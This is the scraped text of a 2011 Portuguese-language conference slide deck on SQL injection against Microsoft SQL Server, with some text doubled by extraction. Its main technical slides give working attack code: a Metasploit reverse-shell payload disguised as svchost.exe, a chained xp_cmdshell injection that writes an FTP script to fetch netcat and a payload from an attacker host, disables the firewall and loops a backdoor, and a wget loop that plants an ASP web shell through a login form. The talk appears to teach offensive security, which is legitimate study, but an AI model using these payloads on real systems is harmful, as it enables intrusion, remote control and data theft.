Vale Security Conference - 2011 - 3 - Rener Alberto (Gr1nch) [DC Labs]
16
Rêner Alberto / Gr1nch SQL Injection SQL Injection Pwning a Pwning a Windows Box! Windows Box!
-
Upload
vale-security-conference -
Category
Documents
-
view
640 -
download
1
description
Vale Security Conference - 2011Sábado - 3ª PalestraPalestrante : Rener Alberto (Gr1nch) [DC Labs]Palestra : SQL Injection - Pwning a Windows box!!!Twitter (Rener Alberto) : https://twitter.com/#!/Gr1nchDCVídeo da Palestra (You Tube) : http://www.youtube.com/watch?v=hpGU44BHPvoSlide (SlideShare) : http://www.slideshare.net/valesecconf/gr1nch
Transcript of Vale Security Conference - 2011 - 3 - Rener Alberto (Gr1nch) [DC Labs]
![Page 1: Vale Security Conference - 2011 - 3 - Rener Alberto (Gr1nch) [DC Labs]](https://reader034.fdocuments.in/reader034/viewer/2022052620/557ad40bd8b42add288b50cb/html5/thumbnails/1.jpg)
Rêner Alberto / Gr1nch
SQL Injection SQL Injection Pwning a Pwning a
Windows Box!Windows Box!
![Page 2: Vale Security Conference - 2011 - 3 - Rener Alberto (Gr1nch) [DC Labs]](https://reader034.fdocuments.in/reader034/viewer/2022052620/557ad40bd8b42add288b50cb/html5/thumbnails/2.jpg)
AGENDAAGENDA Como encontrar a falha?Como encontrar a falha? Explorando a moda antiga.Explorando a moda antiga. Stored Procedures.Stored Procedures. E.B.G: Demo Shell reverso via SQLiE.B.G: Demo Shell reverso via SQLi E.B.G: Demo Upload ASP com SQLiE.B.G: Demo Upload ASP com SQLi Ferramentas para SQLi: Ferramentas para SQLi:
– Demo SQLMAPDemo SQLMAP
– Demo Havij Demo Havij Momento CapivaraMomento Capivara
![Page 3: Vale Security Conference - 2011 - 3 - Rener Alberto (Gr1nch) [DC Labs]](https://reader034.fdocuments.in/reader034/viewer/2022052620/557ad40bd8b42add288b50cb/html5/thumbnails/3.jpg)
Como encontrar a falha?Como encontrar a falha? A velha história A velha história dos inputs.dos inputs.
DEMO Google Scans.DEMO Google Scans. Fuzzing.Fuzzing. Demo: Gr1nch ScanDemo: Gr1nch Scan
![Page 4: Vale Security Conference - 2011 - 3 - Rener Alberto (Gr1nch) [DC Labs]](https://reader034.fdocuments.in/reader034/viewer/2022052620/557ad40bd8b42add288b50cb/html5/thumbnails/4.jpg)
DEMO GR1nch SQLi ScanDEMO GR1nch SQLi Scan
![Page 5: Vale Security Conference - 2011 - 3 - Rener Alberto (Gr1nch) [DC Labs]](https://reader034.fdocuments.in/reader034/viewer/2022052620/557ad40bd8b42add288b50cb/html5/thumbnails/5.jpg)
Hackeando a aplicação web.Hackeando a aplicação web.Demo:Demo:
– ObtendObtendo informações po informações pelos erros.elos erros.
– Enumerando os campos da tabela.Enumerando os campos da tabela.
– Descobrindo o tipo do campo.Descobrindo o tipo do campo.
– Add um user válido.Add um user válido.
– Game Over!Game Over!
Explorando a moda antigaExplorando a moda antiga
![Page 6: Vale Security Conference - 2011 - 3 - Rener Alberto (Gr1nch) [DC Labs]](https://reader034.fdocuments.in/reader034/viewer/2022052620/557ad40bd8b42add288b50cb/html5/thumbnails/6.jpg)
Stored ProceduresStored Procedures Funções do SQL Server úteis no SQLi:Funções do SQL Server úteis no SQLi:
1) 1) xp_cmdshell: Execução de comandos MS-DOSxp_cmdshell: Execução de comandos MS-DOS
2) 2) xp_regread: Ler valores do registroxp_regread: Ler valores do registro
3) 3) xp_regwrite: Escrever no registro.xp_regwrite: Escrever no registro.
4) 4) xp_dirtree / xp_subdirs: Listar diretorios.xp_dirtree / xp_subdirs: Listar diretorios.
5) 5) xp_fixeddrives: Exibir os HD's.xp_fixeddrives: Exibir os HD's.
6) 6) sp_makewebtask: DUMP do banco (REMOVIDA!)sp_makewebtask: DUMP do banco (REMOVIDA!)
![Page 7: Vale Security Conference - 2011 - 3 - Rener Alberto (Gr1nch) [DC Labs]](https://reader034.fdocuments.in/reader034/viewer/2022052620/557ad40bd8b42add288b50cb/html5/thumbnails/7.jpg)
A técnica do E.B.GA técnica do E.B.G EE= Exploit= Exploit
BB= Baseado= Baseado
GG= Gambiarra= Gambiarra Pequenas variações na forma de atacar Pequenas variações na forma de atacar podempodem significar em um bypass nos significar em um bypass nos sistemas de proteção.sistemas de proteção.
Utilize a criativadade quando for Utilize a criativadade quando for explorar uma falha.explorar uma falha.
Nem todo mundo precisa Nem todo mundo precisa
explorar da mesma forma...explorar da mesma forma...
![Page 8: Vale Security Conference - 2011 - 3 - Rener Alberto (Gr1nch) [DC Labs]](https://reader034.fdocuments.in/reader034/viewer/2022052620/557ad40bd8b42add288b50cb/html5/thumbnails/8.jpg)
E.B.G:Shell Windows via SQLiE.B.G:Shell Windows via SQLi
![Page 9: Vale Security Conference - 2011 - 3 - Rener Alberto (Gr1nch) [DC Labs]](https://reader034.fdocuments.in/reader034/viewer/2022052620/557ad40bd8b42add288b50cb/html5/thumbnails/9.jpg)
Shell Windows via SQLiShell Windows via SQLiUtilizando o MetaSploit para criar um XPL:
msfpayload windows/shell_reverse_tcp LHOST=192.168.XXX.XXX LPORT=???? X > /FTP/svchost.exe
Arquivo gr1nch.txt: ------------------------------------------------------------- open XXX.XXX.XXX.XXX 21 USER gr1nch p4s$w0rd binary get svchost.exe %temp%\svchost.exe quit
Arquivo d00r.bat:------------------------------------------------------------ cd %temp% ftp -i -n -v -s:%temp%\gr1nch.txt :backd00r netsh firewall set opmode mode = disable svchost.exe goto backd00r
![Page 10: Vale Security Conference - 2011 - 3 - Rener Alberto (Gr1nch) [DC Labs]](https://reader034.fdocuments.in/reader034/viewer/2022052620/557ad40bd8b42add288b50cb/html5/thumbnails/10.jpg)
while read linedoSQL_STRING=$(echo -n "$line" | hexdump -v -e '"#" 1/1 "%02X"' | sed -e 's:#:%:g')wget --post-data="username=';exec%20xp_cmdshell%20'echo%20"$SQL_STRING"%20>>%20c:\\inetpub\\wwwroot\\gr1nch.asp'--" http://192.168.2.50/process_login.asp >> /dev/null 2>&1done < gr1nch.asprm process_login.*
Upload CMD.ASP via SQLiUpload CMD.ASP via SQLiE.B.G. Code:E.B.G. Code:
![Page 11: Vale Security Conference - 2011 - 3 - Rener Alberto (Gr1nch) [DC Labs]](https://reader034.fdocuments.in/reader034/viewer/2022052620/557ad40bd8b42add288b50cb/html5/thumbnails/11.jpg)
E.B.G DEMO 1E.B.G DEMO 1
Let's Hack!Let's Hack!
![Page 12: Vale Security Conference - 2011 - 3 - Rener Alberto (Gr1nch) [DC Labs]](https://reader034.fdocuments.in/reader034/viewer/2022052620/557ad40bd8b42add288b50cb/html5/thumbnails/12.jpg)
E.B.G. Code:E.B.G. Code: Shell Windows via SQLiShell Windows via SQLi
';exec xp_cmdshell 'echo open XXX.XXX.XXX.XXX 21 > %temp%\gr1nch.txt';exec xp_cmdshell 'echo USER d3f4c3r DcLabs@2009 >> %temp%\gr1nch.txt';exec xp_cmdshell 'echo binary >> %temp%\gr1nch.txt';exec xp_cmdshell 'echo get nc.exe %temp%\svchost.exe >> %temp%\gr1nch.txt';exec xp_cmdshell 'echo get xpl.asp %temp%\xpl.asp >> %temp%\gr1nch.txt';exec xp_cmdshell 'echo quit >> %temp%\gr1nch.txt';exec xp_cmdshell 'echo cd %temp% > %temp%\d00r.bat';exec xp_cmdshell 'echo ftp -i -n -v -s:%temp%\gr1nch.txt >> %temp%\d00r.bat';exec xp_cmdshell 'echo :backd00r >> %temp%\d00r.bat';exec xp_cmdshell 'echo netsh firewall set opmode mode = disable >> %temp%\d00r.bat';exec xp_cmdshell 'echo svchost.exe >> %temp%\d00r.bat';exec xp_cmdshell 'echo goto backd00r >> %temp%\d00r.bat';exec xp_cmdshell '%temp%\d00r.bat'-----------------------------------------------------------------------------------------------
![Page 13: Vale Security Conference - 2011 - 3 - Rener Alberto (Gr1nch) [DC Labs]](https://reader034.fdocuments.in/reader034/viewer/2022052620/557ad40bd8b42add288b50cb/html5/thumbnails/13.jpg)
Let's Hack!Let's Hack!
E.B.G DEMO 2E.B.G DEMO 2
![Page 14: Vale Security Conference - 2011 - 3 - Rener Alberto (Gr1nch) [DC Labs]](https://reader034.fdocuments.in/reader034/viewer/2022052620/557ad40bd8b42add288b50cb/html5/thumbnails/14.jpg)
Ferramentas de SQLiFerramentas de SQLi Ferramentas foram feitas para auxiliar Ferramentas foram feitas para auxiliar seu trabalho não para trabalhar por seu trabalho não para trabalhar por você.você.
Utilizar uma ferramenta de ataque sem Utilizar uma ferramenta de ataque sem conhecimento não faz de você um hacker.conhecimento não faz de você um hacker.
DEMO utilizando o SQLMAPDEMO utilizando o SQLMAP DEMO utilizando o HAVIJDEMO utilizando o HAVIJ
![Page 15: Vale Security Conference - 2011 - 3 - Rener Alberto (Gr1nch) [DC Labs]](https://reader034.fdocuments.in/reader034/viewer/2022052620/557ad40bd8b42add288b50cb/html5/thumbnails/15.jpg)
Momento CapivaraMomento Capivara
Dúvidas, Elogios Dúvidas, Elogios ouou
Blasfêmias?Blasfêmias?
![Page 16: Vale Security Conference - 2011 - 3 - Rener Alberto (Gr1nch) [DC Labs]](https://reader034.fdocuments.in/reader034/viewer/2022052620/557ad40bd8b42add288b50cb/html5/thumbnails/16.jpg)
Obrigado!Obrigado!Mail: [email protected]: [email protected]: @Gr1nchDCTwitter: @Gr1nchDCIRC: IRC: irc.freenode.net /j #DcLabsirc.freenode.net /j #DcLabs
Site: www.dclabs.com.brSite: www.dclabs.com.br
